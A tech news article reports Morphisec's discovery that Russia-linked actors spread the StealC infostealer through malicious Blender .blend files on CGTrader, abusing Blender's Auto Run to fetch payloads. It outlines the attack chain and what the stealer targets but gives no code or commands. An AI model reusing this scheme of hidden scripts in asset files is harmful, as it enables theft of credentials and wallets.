- Russian hackers exploit Blender’s Auto Run feature to deliver StealC infostealer via .blend files
- Malware deployed through CGTrader assets and pulls payloads from Cloudflare Workers domains
- StealC Variant Targets Browsers, Crypto Wallets, Chat Apps and VPN Clients Undetected
Blender has a handy but risky feature that experts have found is being exploited by Russian hackers to deliver infostealer malware.
Cyber security researchers Morphisec observed the attacks in the wild and urged designers and other professionals to be vigilant.
Blender is a widely used open source 3D creation suite popular among artists, animators, game developers and studios for everything from modeling and rendering to visual effects. There’s also CGTrader, a marketplace where 3D artists and designers can buy, sell, and share user-generated models and assets for their projects.
Significant impact
Now, Morphisec says it saw Russia-linked cybercriminals upload .blend files with embedded Python code to CGTrader.
The code pulls a malware loader from a Cloudflare Workers domain, which in turn pulls two ZIP archives. These implement two payloads, including a StealC infostealer and an additional Python thief, probably as a fallback.
Obviously, the Python code needs to be triggered. This is where the “convenient but risky” feature comes into play. It is called Auto Run and if enabled when a user opens a character rich, the script automatically loads the face controls and custom UI panels and consequently triggers the malware deployment process.
StealC is a popular info stealer that has been around for years and was observed in several high-profile campaigns. It’s also constantly evolving, with newer versions getting better at persistence, stealth and infostealing features.
This latest variant, used in this campaign, can extract data from more than 20 browsers, more than 100 cryptocurrency wallet browser extensions, more than 15 cryptocurrency wallet apps, the majority of chat apps, as well as VPN clients.
Via Bleeping Computer
The best antivirus for all budgets
Follow TechRadar on Google News and add us as a preferred source to get our expert news, reviews and opinions in your feeds. Be sure to click the Follow button!
And of course you can too follow TechRadar on TikTok for news, reviews, video unboxings, and get regular updates from us on WhatsApp also.
